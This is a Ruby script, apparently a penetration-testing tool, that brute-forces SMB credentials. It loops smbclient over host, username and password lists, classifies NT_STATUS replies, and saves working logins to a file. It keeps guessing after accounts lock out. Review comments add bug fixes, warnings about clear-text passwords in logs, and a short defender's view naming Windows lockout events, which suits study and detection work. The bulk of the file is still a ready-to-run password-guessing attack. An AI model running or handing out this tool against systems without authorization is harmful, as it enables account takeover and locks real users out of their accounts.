smbv2attack.rb
#!/usr/bin/env ruby
#smbv2 password attack tool
require 'tty'
require 'logger'
require 'colorize'
require 'trollop'
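# Parses the command line with Trollop and returns the resulting options hash.
#
# Keys read by the rest of the script: :host / :hosts (single target or a file
# of targets), :user / :users, :password / :passwords and :domain (defaults to
# "WORKGROUP").
#
# Exits early with a hint when no arguments are given, and stops with a usage
# error when neither a host nor a user source is supplied. Without that check
# the list builders call a String method on nil and die with NoMethodError.
def arguments
  # Same early exit as before; it does not depend on parsing, so it runs first.
  if ARGV.empty?
    puts "Need Help? Try ./smbv2attack.rb --help"
    exit
  end

  opts = Trollop::options do
    version "smbv2attack 0.1b".light_blue
    opt :hosts, "Choose hosts to attack", type: String, short: "-H"
    opt :host, "Choose host to attack", type: String, short: "-h"
    opt :user, "Username", type: String, short: "-u"
    opt :users, "Username List", type: String, short: "-U"
    opt :passwords, "Password list", type: String, short: "-P"
    # The help text used to read "Password list", duplicating --passwords.
    opt :password, "Password", type: String, short: "-p"
    opt :domain, "Domain to attack", type: String, default: "WORKGROUP", short: "-d"
  end

  Trollop::die "one of --host or --hosts is required" unless opts[:host] || opts[:hosts]
  Trollop::die "one of --user or --users is required" unless opts[:user] || opts[:users]
  opts
end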
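# Returns the path of the smbclient binary found on PATH, invoking
# install_smbclient first when it is missing.
#
# The previous version returned the nil captured before the install attempt,
# so callers could not tell whether the binary had become available.
#
# @return [String, nil] path to smbclient, or nil if it is still not found
def check_smbclient
  found = TTY::Which.which('smbclient')
  return found if found

  install_smbclient
  # Resolve again so the result reflects the state after the install attempt.
  TTY::Which.which('smbclient')
end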
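# Installs the smbclient package through apt-get and aborts the script when
# the install does not succeed.
#
# NOTE(review): installing a system package as a side effect of running a tool
# changes the host and needs root. Operators who want least privilege should
# install smbclient themselves before running the script.
def install_smbclient
  puts "SMBClient Not Installed. Downloading Now....".light_blue.bold
  # Backticks captured and discarded apt-get's output, hiding its confirmation
  # prompt and any error. system() with separate arguments keeps the terminal
  # attached and reports success or failure.
  installed = system('apt-get', 'install', 'smbclient')
  abort 'apt-get could not install smbclient; install it manually and re-run' unless installed
end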
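# Builds @hosts from a host-list file (arg[:hosts]) or a single host (arg[:host]).
#
# Every entry is stripped of surrounding whitespace and blank lines in the file
# are skipped, so an empty string never reaches the smbclient invocation.
# The file content is untrusted text: smb2_attack later uses these values to
# build a command, so nothing here may be assumed shell-safe.
#
# @param arg [Hash] parsed options; reads :hosts and :host
# @return [Array<String>] the host list, also stored in @hosts
# @raise [ArgumentError] when neither :hosts nor :host is given
def create_host_list(arg)
  @hosts =
    if arg[:hosts]
      # The old `map(&:chomp &&:strip)` evaluated `:chomp && :strip` first, so
      # only strip was ever applied; that is now written explicitly.
      File.readlines(arg[:hosts]).map(&:strip).reject(&:empty?)
    elsif arg[:host]
      [arg[:host].strip]
    else
      raise ArgumentError, 'either :hosts (file) or :host is required'
    end
end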
# Builds @pass from a password file (arg[:passwords]) or the single
# arg[:password] value.
#
# File entries are stripped of surrounding whitespace (the original
# `&:chomp &&:strip` evaluates to `&:strip`), and blank lines stay in the list
# as empty strings. The single value is used untouched, so a missing
# --password yields [nil].
#
# NOTE(review): these values are secrets. They are later placed on a command
# line and may appear in debug.log, so the resulting files need protecting.
#
# @param arg [Hash] parsed options; reads :passwords and :password
# @return [Array] the candidate list, also stored in @pass
def create_pass_list(arg)
  list_path = arg[:passwords]
  @pass = list_path ? File.readlines(list_path).map(&:strip) : [arg[:password]]
end
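# Builds @users from a username file (arg[:users]) or a single name (arg[:user]).
#
# Every entry is stripped of surrounding whitespace and blank lines in the file
# are skipped. The file content is untrusted text: smb2_attack later uses these
# values to build a command, so nothing here may be assumed shell-safe.
#
# @param arg [Hash] parsed options; reads :users and :user
# @return [Array<String>] the username list, also stored in @users
# @raise [ArgumentError] when neither :users nor :user is given
def create_user_list(arg)
  @users =
    if arg[:users]
      # The old `map(&:chomp &&:strip)` evaluated `:chomp && :strip` first, so
      # only strip was ever applied; that is now written explicitly.
      File.readlines(arg[:users]).map(&:strip).reject(&:empty?)
    elsif arg[:user]
      [arg[:user].strip]
    else
      raise ArgumentError, 'either :users (file) or :user is required'
    end
end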
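# Returns the TTY::Command runner used for every smbclient invocation, with its
# output sent to a Logger writing to debug.log in the working directory.
#
# The runner and logger are created once and reused. smb2_attack calls this
# method inside its innermost loop, and the previous version opened a new
# Logger (and log file handle) on every call.
#
# NOTE(review): TTY::Command presumably logs each command line it runs, which
# here contains the username and password in clear text. debug.log should be
# treated as a credential file: restrict its permissions and delete it after
# the engagement. Confirm against the tty-command printer in use.
def command
  @log ||= Logger.new('debug.log')
  @cmd ||= TTY::Command.new(output: @log)
end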
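# Tries every host/user/password combination from @hosts, @users and @pass by
# running smbclient against the share name QZQ$, and classifies each attempt
# from the NT_STATUS code in smbclient's output. Combinations classified as
# valid are appended to "<HH:MM:SS>_valid_accounts.txt" as host:user:pass.
#
# Defender's view: on the target this loop shows up as a rapid series of SMB
# logon failures from one source (Windows Security event 4625), possibly
# followed by account lockouts (event 4740). Lockout thresholds and alerting on
# such bursts are the relevant mitigations.
#
# NOTE(review): the loop keeps submitting guesses for an account after the
# server reports NT_STATUS_ACCOUNT_LOCKED_OUT. On an authorized test that
# prolongs the lockout for the account's real owner.
#
# @param arg [Hash] parsed options; reads :domain
def smb2_attack(arg)
  file = "#{Time.now.strftime("%H:%M:%S")}_valid_accounts.txt"
  puts "Attack Started #{Time.now.strftime("%H:%M:%S")}".light_blue
  @hosts.each do |host|
    @users.each do |user|
      @pass.each do |pass|
        # Host, user and password come from operator-supplied files and used to
        # be interpolated into a single shell string. A line holding shell
        # metacharacters (`;`, backticks, `$(...)`) would then run on the
        # operator's own machine. Passing separate arguments makes TTY::Command
        # treat each value as one literal argument.
        # NOTE(review): the password is still visible in the local process list
        # while smbclient runs. smbclient's -A/--authentication-file option
        # avoids that.
        out, _err = command.run!(
          'smbclient', '-W', arg[:domain].to_s,
          '--max-protocol=smb3', '--port=445', '--timeout=0.5',
          "//#{host}/QZQ$", '-U', "#{user}%#{pass}"
        )
        case out
        when /NT_STATUS_LOGON_FAILURE|NT_STATUS_ACCOUNT_DISABLED|NT_STATUS_ACCOUNT_EXPIRED/
          print "[+] #{host} Username: #{user} Password: #{pass} LOGIN FAILED - MESSAGE = #{out.split(":")[1]}"
        when /NT_STATUS_ACCESS_DENIED|NT_STATUS_BAD_NETWORK_NAME|NT_STATUS_PASSWORD_MUST_CHANGE/
          print "[*] #{host} Username: #{user} Password: #{pass} LOGIN SUCCESS - MESSAGE = #{out.split(":")[1]}".green.bold
          # The results file holds clear-text credentials. 0o600 creates it
          # readable by the owner only; the mode applies at creation time.
          File.open(file, 'a', 0o600) { |f| f.puts("#{host}:#{user}:#{pass}") }
        when /NT_STATUS_ACCOUNT_LOCKED_OUT/
          puts "[!] #{host} Username: #{user} Password: #{pass} ACCOUNT LOCKED OUT!!!!".red.bold
        else
          puts "[?] #{host} Username: #{user} Password: #{pass} UNKNOWN STATUS - MESSAGE = #{out.split(":")[1]}".cyan.bold
        end
      end
    end
  end
  puts "Attack Finished #{Time.now.strftime("%H:%M:%S")}".light_blue
  puts "Valid Passwords Written to #{file}".light_magenta.bold
end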
# Script entry point: parse options, make sure smbclient is present, build the
# three input lists, then run the credential loop.
options = arguments
# The return value (path to smbclient, or nil) is not checked here, so the run
# continues even when the binary is still missing.
check_smbclient
create_host_list(options)
create_user_list(options)
create_pass_list(options)
smb2_attack(options)